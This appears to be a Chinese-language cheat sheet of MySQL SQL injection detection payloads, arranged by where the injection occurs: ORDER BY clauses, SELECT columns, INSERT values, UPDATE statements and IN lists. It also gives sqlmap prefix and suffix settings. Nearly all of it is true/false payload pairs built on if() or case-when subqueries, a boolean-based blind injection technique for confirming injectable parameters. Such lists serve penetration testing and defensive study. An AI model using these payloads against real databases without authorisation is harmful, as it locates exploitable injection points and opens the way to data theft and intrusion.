整理的mysql各种位置sql注入基本检测语句

previous page next page
order by xx {sql}  : 
  1. ,if((1=1),1,(select 1 union select 2)) 
  2. ,if((1=2),1,(select 1 union select 2))
sqlmap
  1. 设置前缀:,if((1=1
  2. 设置后缀:),1,(select 1 union select 2))
=======================================================

select xxx( as x) {sql} from xx   :
  1. ,case when(1=1)then 1 else (select 1 union select 2) end 
  2. ,case when(1=2)then 1 else (select 1 union select 2) end
=======================================================

select * from xxx order by {sql}   :
  1. (case when(1=1) then 1 else (select 1 union select 2) end) 
  2. (case when(1=2) then 1 else (select 1 union select 2) end)
or 
  1. 已存在字段,if((1=1),1,(select 1 union select 2)) 
  2. 已存在字段,if((1=2),1,(select 1 union select 2))       
=======================================================

insert into person (number,name) values (1,'{sql}')   :
  1. '+(if((1=1),1,(select 1 union select 2)))+' 
  2. '+(if((1=2),1,(select 1 union select 2)))+'
or 
  1. '+(case when(1=1) then 1 else (select 1 union select 2) end)+' 
  2. '+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================

update xxx set x='{sql}'    :
  1. '+(if((1=1),1,(select 1 union select 2)))+' 
  2. '+(if((1=2),1,(select 1 union select 2)))+'
or 
  1. '+(case when(1=1) then 1 else (select 1 union select 2) end)+' 
  2. '+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================

update xxx set x=x where xx ='{sql}'   :
  1. '+(case when(1=1) then 1 else (select 1 union select 2) end)+' 
  2. '+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================

select * from xxx where x in (‘xx’,’{sql}’)   :   
  1. '+if((1=1),1,(select 1 union select 2))+' 
  2. '+if((1=2),1,(select 1 union select 2))+'

previous page start next page